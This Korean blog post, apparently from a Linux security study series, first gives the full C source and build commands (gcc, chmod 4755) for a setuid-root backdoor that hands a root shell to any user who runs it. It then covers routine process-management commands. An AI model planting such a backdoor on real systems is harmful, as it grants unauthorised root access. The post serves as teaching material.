Backdoor
- Backdoor
일반사용자가 실행 시 관리자로 계정변환
backdoor.c
#include <stdio.h>
int main(){
setuid(0); // uid = 0 은 관리자
setgid(0); // gid = 0 은 관리자 그룹
system("/bin/bash"); //or system("/bin/sh");
return 0;
}
gcc ./backdoor.c -o ./backdoor //backdoor.c 소스 코드를 컴파일하고 실행 파일을 빌드 한다.
chmod 4755 ./backdoor //setuid 허가권 + 소유자(rwx),그룹(r-x),그 외 사용자(r-x) => (4755/-rwsr-xr-x)
관리자가 아닌 계정이 이 파일을 실행하면 관리자 계정으로 변환 되고
로그아웃을 하면 다시 원래 계정으로 돌아온다.
Process Management
- Foreground
실행중인 포그라운드 작업을 백그라운드 작업으로 전환 : Ctrl + z
포그라운드 작업 취소 : Ctrl + c
백그라운드 작업을 포그라운드로 작업으로 전환 : fg ex) fg [작업번호] or fg %[작업번호]
- Backgroud
실행 시간이 오래 걸리는 프로세스를 뒤로 보낼 때 명령어 뒤에 " & " 를 붙여서 실행
ex) ping localhost > /dev/null &
백그라운드 작업 실행 : bg ex) bg [작업번호] or bg %[작업번호]
- 작업리스트 보기 : jobs
* 백그라운드 마지막작업은 + 표시 , 백그라운드 마지막작업 전은 - 표시
- 현 프로세스 조회 : ps [Option]
ex) ps -ef //간단히 보기 (윈도우-모든 사용자의 프로세스 표시 체크하는 경우랑 같음)
ex) ps -aux //자세히 보기
/*
? : 부팅하면서 자동으로 실행
tty번호 : 가상머신 리눅스
pts/번호 : putty
CMD : 입력했던 명령어
*/
'보안 > Linux' 카테고리의 다른 글
Linux -13 Link , Vi Editor (0) | 2016.04.07 |
---|---|
Linux -12 Process Management Ⅱ (0) | 2016.04.06 |
Linux -10 Permissions (0) | 2016.04.04 |
Linux -9 User Account Management Ⅱ (0) | 2016.04.01 |
Linux -8 User Account Management Ⅰ (0) | 2016.03.31 |